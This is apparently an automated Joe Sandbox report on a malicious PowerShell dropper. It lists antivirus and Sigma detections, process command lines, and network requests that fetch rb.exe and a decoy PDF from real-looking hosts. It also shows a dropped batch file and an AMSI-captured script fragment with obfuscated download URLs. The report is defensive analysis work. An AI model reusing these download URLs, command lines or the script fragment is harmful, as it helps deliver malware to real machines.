Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
ER4HMMzeQ3.ps1

Overview

General Information

Sample name:ER4HMMzeQ3.ps1
renamed because original name is a hash value
Original sample name:e7e0f0c28c75837367088d127100c545ca92a40f20b17fb5eb3205f3583a9c09.ps1
Analysis ID:1578213
MD5:6f6360404593e3dfcddbe109dc6bbc4e
SHA1:62b5dc699e54dd5f3bd387771428063123d10d90
SHA256:e7e0f0c28c75837367088d127100c545ca92a40f20b17fb5eb3205f3583a9c09
Tags:185-236-228-9287-120-112-91ps1www-al-rasikh-comuser-JAMESWT_MHT
Infos:

Detection

Score:80
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for submitted file
Yara detected Powershell download and execute
AI detected suspicious sample
Powershell creates an autostart link
Sigma detected: Powerup Write Hijack DLL
Sigma detected: Windows Shell/Scripting Application File Write to Suspicious Folder
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Suricata IDS alerts with low severity for network traffic
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • powershell.exe (PID: 5012 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\ER4HMMzeQ3.ps1" MD5: 04029E121A0CFA5991749937DD22A1D9)
    • conhost.exe (PID: 5900 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
Process Memory Space: powershell.exe PID: 5012JoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
    SourceRuleDescriptionAuthorStrings
    amsi64_5012.amsi.csvJoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security

      System Summary

      barindex
      Source: File createdAuthor: Subhash Popuri (@pbssubhash): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 5012, TargetFilename: C:\Users\Public\fx2z.bat
      Source: File createdAuthor: Florian Roth (Nextron Systems): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 5012, TargetFilename: C:\Users\Public\fx2z.bat
      Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\ER4HMMzeQ3.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\ER4HMMzeQ3.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4084, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\ER4HMMzeQ3.ps1", ProcessId: 5012, ProcessName: powershell.exe
      Source: File createdAuthor: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 5012, TargetFilename: C:\Users\Public\fx2z.bat
      Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\ER4HMMzeQ3.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\ER4HMMzeQ3.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4084, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\ER4HMMzeQ3.ps1", ProcessId: 5012, ProcessName: powershell.exe
      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2024-12-19T12:37:33.203420+010020197142Potentially Bad Traffic192.168.2.84970584.32.84.229443TCP

      Click to jump to signature section

      Show All Signature Results

      AV Detection

      barindex
      Source: ER4HMMzeQ3.ps1Avira: detected
      Source: ER4HMMzeQ3.ps1Virustotal: Detection: 31%Perma Link
      Source: ER4HMMzeQ3.ps1ReversingLabs: Detection: 39%
      Source: Submited SampleIntegrated Neural Analysis Model: Matched 96.2% probability
      Source: unknownHTTPS traffic detected: 84.32.84.229:443 -> 192.168.2.8:49705 version: TLS 1.2
      Source: Binary string: ystem.pdb source: powershell.exe, 00000000.00000002.1594642485.00000147EBCF0000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: m.Core.pdb source: powershell.exe, 00000000.00000002.1594642485.00000147EBCF0000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: C:\Windows\mscorlib.pdbpdblib.pdb source: powershell.exe, 00000000.00000002.1596474042.00000147EC035000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000000.00000002.1569736015.00000147D1DF2000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: mscorlib.pdb source: powershell.exe, 00000000.00000002.1569736015.00000147D1DF2000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdb source: powershell.exe, 00000000.00000002.1596474042.00000147EBF9B000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb} source: powershell.exe, 00000000.00000002.1596474042.00000147EBF9B000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: \System.pdbG source: powershell.exe, 00000000.00000002.1594642485.00000147EBCF0000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000000.00000002.1596474042.00000147EBF9B000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: CallSite.Target.pdbny source: powershell.exe, 00000000.00000002.1594642485.00000147EBD35000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: ion.pdb source: powershell.exe, 00000000.00000002.1596474042.00000147EBF9B000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: System.pdb.pdb source: powershell.exe, 00000000.00000002.1569736015.00000147D1DF2000.00000004.00000020.00020000.00000000.sdmp
      Source: global trafficHTTP traffic detected: GET /rh/rb.exe HTTP/1.1Host: www.yashenviro.comConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /rh/List%20of%20required%20items%20and%20services.pdf HTTP/1.1Host: www.bluemaxxlaser.comConnection: Keep-Alive
      Source: Joe Sandbox ViewIP Address: 203.175.174.69 203.175.174.69
      Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
      Source: Network trafficSuricata IDS: 2019714 - Severity 2 - ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile : 192.168.2.8:49705 -> 84.32.84.229:443
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: global trafficHTTP traffic detected: GET /rh/rb.exe HTTP/1.1Host: www.yashenviro.comConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /rh/List%20of%20required%20items%20and%20services.pdf HTTP/1.1Host: www.bluemaxxlaser.comConnection: Keep-Alive
      Source: global trafficDNS traffic detected: DNS query: www.yashenviro.com
      Source: global trafficDNS traffic detected: DNS query: yashenviro.com
      Source: global trafficDNS traffic detected: DNS query: www.bluemaxxlaser.com
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 19 Dec 2024 11:37:35 GMTServer: ApacheContent-Length: 315Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
      Source: powershell.exe, 00000000.00000002.1594642485.00000147EBD75000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microg
      Source: powershell.exe, 00000000.00000002.1591288211.00000147E3D91000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1591288211.00000147E3C4E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
      Source: powershell.exe, 00000000.00000002.1573938786.00000147D3E12000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
      Source: powershell.exe, 00000000.00000002.1573938786.00000147D3BE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
      Source: powershell.exe, 00000000.00000002.1573938786.00000147D3E12000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
      Source: powershell.exe, 00000000.00000002.1573938786.00000147D56F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.bluemaxxlaser.com
      Source: powershell.exe, 00000000.00000002.1573938786.00000147D56F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.bluemaxxlaser.com/rh/List%20of%20required%20items%20and%20services.pdf
      Source: powershell.exe, 00000000.00000002.1573938786.00000147D3E12000.00000004.00000800.00020000.00000000.sdmp, ER4HMMzeQ3.ps1String found in binary or memory: http://www.blukbbmaxxlaskbbr.com/rh/List%20of%20rkbbquirkbbd%20itkbbms%20and%20skbbrvickbbs.pdf
      Source: powershell.exe, 00000000.00000002.1596474042.00000147EC035000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.n
      Source: powershell.exe, 00000000.00000002.1573938786.00000147D52E2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.yashenviro.com
      Source: powershell.exe, 00000000.00000002.1573938786.00000147D52E2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.yashenviro.com.cdn.hstgr.net
      Source: powershell.exe, 00000000.00000002.1573938786.00000147D5320000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://yashenviro.com
      Source: powershell.exe, 00000000.00000002.1573938786.00000147D3BE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
      Source: powershell.exe, 00000000.00000002.1591288211.00000147E3C4E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
      Source: powershell.exe, 00000000.00000002.1591288211.00000147E3C4E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
      Source: powershell.exe, 00000000.00000002.1591288211.00000147E3C4E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
      Source: powershell.exe, 00000000.00000002.1573938786.00000147D3E12000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
      Source: powershell.exe, 00000000.00000002.1573938786.00000147D4812000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
      Source: powershell.exe, 00000000.00000002.1591288211.00000147E3D91000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1591288211.00000147E3C4E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
      Source: powershell.exe, 00000000.00000002.1573938786.00000147D52DC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.yashenviro.com
      Source: powershell.exe, 00000000.00000002.1573938786.00000147D5212000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.yashenviro.com/rh/rb.exep
      Source: powershell.exe, 00000000.00000002.1573938786.00000147D5212000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.yashkbbnviro.com/rh/rb.kbbxkbbp
      Source: powershell.exe, 00000000.00000002.1573938786.00000147D5307000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1573938786.00000147D5303000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1573938786.00000147D52E2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://yashenviro.com
      Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
      Source: unknownHTTPS traffic detected: 84.32.84.229:443 -> 192.168.2.8:49705 version: TLS 1.2
      Source: classification engineClassification label: mal80.evad.winPS1@2/5@3/2
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\Public\fx2z.batJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5900:120:WilError_03
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gditfqmz.3xl.ps1Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Users\desktop.iniJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
      Source: ER4HMMzeQ3.ps1Virustotal: Detection: 31%
      Source: ER4HMMzeQ3.ps1ReversingLabs: Detection: 39%
      Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\ER4HMMzeQ3.ps1"
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: linkinfo.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntshrui.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cscapi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: policymanager.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvcp110_win.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: taskflowdataengine.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cdp.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: umpdc.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dsreg.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dlnashext.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wpdshext.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
      Source: Binary string: ystem.pdb source: powershell.exe, 00000000.00000002.1594642485.00000147EBCF0000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: m.Core.pdb source: powershell.exe, 00000000.00000002.1594642485.00000147EBCF0000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: C:\Windows\mscorlib.pdbpdblib.pdb source: powershell.exe, 00000000.00000002.1596474042.00000147EC035000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000000.00000002.1569736015.00000147D1DF2000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: mscorlib.pdb source: powershell.exe, 00000000.00000002.1569736015.00000147D1DF2000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdb source: powershell.exe, 00000000.00000002.1596474042.00000147EBF9B000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb} source: powershell.exe, 00000000.00000002.1596474042.00000147EBF9B000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: \System.pdbG source: powershell.exe, 00000000.00000002.1594642485.00000147EBCF0000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000000.00000002.1596474042.00000147EBF9B000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: CallSite.Target.pdbny source: powershell.exe, 00000000.00000002.1594642485.00000147EBD35000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: ion.pdb source: powershell.exe, 00000000.00000002.1596474042.00000147EBF9B000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: System.pdb.pdb source: powershell.exe, 00000000.00000002.1569736015.00000147D1DF2000.00000004.00000020.00020000.00000000.sdmp
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFB4AFE00BD pushad ; iretd 0_2_00007FFB4AFE00C1
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFB4B0B8565 push eax; iretd 0_2_00007FFB4B0B8939

      Boot Survival

      barindex
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: .lnk -Name));getit -fz ($fzf + 'List of required items and services.pdf') -oulv 'http://www.blukbbmaxxlaskbbr.com/rh/List%20of%20rkbbquirkbbd%20itkbbms%20and%20skbbrvickbbs.pdf';exit@{# Script module or binary module file associated with this manifest.ModuleToProcess = 'Pester.psm1'# Version number of this module.ModuleVersion = '3.4.0'# ID used to uniquely identify this moduleGUID = 'a699dea5-2c73-4616-a270-1f7abb777e71'# Author of this moduleAuthor = 'Pester Team'# Company or vendor of this moduleCompanyName = 'Pester'# Copyright statement for this moduleCopyright = 'Copyright (c) 2016 by Pester Team, licensed under Apache 2.0 License.'# Description of the functionality provided by this moduleDescription = 'Pester provides a framework for running BDD style Tests to execute and validate PowerShell commands inside of PowerShell and offers a powerful set of Mocking Functions that allow tests to mimic and mock the functionality of any command inside of a piece of powershell code being tested. Pester tests can execute any command or script that is accesible to a pester test file. This can include functions, Cmdlets, Modules and scripts. Pester can be run in ad hoc style in a console or it can be integrated into the Build scripts of a Continuous Integration system.'# Minimum version of the Windows PowerShell engine required by this modulePowerShellVersion = '2.0'# Functions to export from this moduleFunctionsToExport = @( 'Describe', 'Context', 'It', 'Should', 'Mock', 'Assert-MockCalled', 'Assert-VerifiableMocks', 'New-Fixture', 'Get-TestDriveItem', 'Invoke-Pester', 'Setup', 'In', 'InModuleScope', 'Invoke-Mock', 'BeforeEach', 'AfterEach', 'BeforeAll', 'AfterAll' 'Get-MockDynamicParameters', 'Set-DynamicParameterVariables', 'Set-TestInconclusive', 'SafeGetCommand', 'New-PesterOption')# # Cmdlets to export from this module# CmdletsToExport = '*'# Variables to export from this moduleVariablesToExport = @( 'Path', 'TagFilter', 'ExcludeTagFilter', 'TestNameFilter', 'TestResult', 'CurrentContext', 'CurrentDescribe', 'CurrentTest', 'SessionState', 'CommandCoverage', 'BeforeEach', 'AfterEach', 'Strict')# # Aliases to export from this module# AliasesToExport = '*'# List of all modules packaged with this module# ModuleList = @()# List of all files packaged with this module# FileList = @()PrivateData = @{ # PSData is module packaging and gallery metadata embedded in PrivateData # It's for rebuilding PowerShellGet (and PoshCode) NuGet-style packages # We had to do this because it's the only place we're allowed to extend the manifest # https://connect.microsoft.com/PowerShell/feedback/details/421837 PSData = @{ # The primary categorization of this module (from the TechNet Gallery tech tree). Category = "Scripting Techniques" # Keyword tags to help users find this module via navigations and search. Tags = @('powers
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
